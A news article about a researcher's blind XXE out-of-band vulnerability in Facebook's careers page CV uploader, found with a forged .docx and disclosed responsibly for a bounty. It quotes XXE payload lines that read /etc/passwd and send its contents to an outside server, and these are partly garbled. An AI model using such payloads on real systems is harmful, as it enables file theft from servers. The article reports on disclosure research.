Security researcher Mohamed Ramadan has discovered a critical vulnerability in Facebook which allows an attacker to hack users’ account using a forged Microsoft Word .docx file. Ramadan is not new to this kind of discoveries, he has already found in the past several vulnerabilities in web services provided by Facebook, Google, Microsoft and Twitter.
Ramadan was performing a reconnaissance of Facebook service when he came onto Facebook’s career page, usually this kind of page allows users to submit their CV through an uploader component. The expert successfully uploaded his CV to the Facebook platform. The Facebook uploader allows only files in PDF or .DOCX formats, then he had the idea to exploit the .docx file, a format designed by Microsoft that basically can be assimilated to a zipped xml file. At this point, he created a fake CV with forged Microsoft Word document and uploaded onto the Facebook careers web page. Below a piece of code included in the XML file he has written.
DOCTYPE root [<!ENTITY % file SYSTEM “file:///etc/passwd”>dtd SYSTEM “http://22.214.171.124/ext.dtd”>%dtd;%send;]]>
He started an HTTP server running on Python on his local machine and he created a file named ext.dtd in the mohaab007 directory. This is the content retrieved of ext.dtd:
<!ENTITY % all“ x25; send SYSTEM ‘http://126.96.36.199/FACEBOOK-HACKED?%25file;’>”>%all;
After uploading the forged Word CV the researcher waited for the Facebook response.
“Now everything is good and then I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened. I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minute or so chatting and browsing now it is time to stop python http server and close Facebook and everything . I was going to close my terminal window and I was shocked to see that something connected to my python http server” he stated in a blog post.
The result is surprising, Ramadan forced a Facebook server to connect to his Python HTTP server, a circumstance that open the doors to several attack scenarios as explained by the expert.
The expert tried to access to Facebook server file system, but failed probably due to security mechanisms the company implemented. The expert anyway was confident that the attack he reproduced was Blind XXE (XML External Entity) Out Of Band (OOB) and noticed also that it was a time-consuming process because he needed to upload and wait the result after more than 15 minutes. Ramadan ethically reported his findings to Facebook that were rejected the first time.
As further evidence of his hack he provided also the forged CV used to force the Facebook server to contact his machine, but he received another negative reply:
He provided other details on his test to the Facebook Security team, which ultimately realized the existence of a serious vulnerability in its file uploader and rewarded Ramadan for his discovery.
Facebook fixed the vulnerability in the uploading mechanism by adding this line of code:
Following is a PoC video of the Facebook Blind XXE OOB:
(Security Affairs – Facebook, hacking)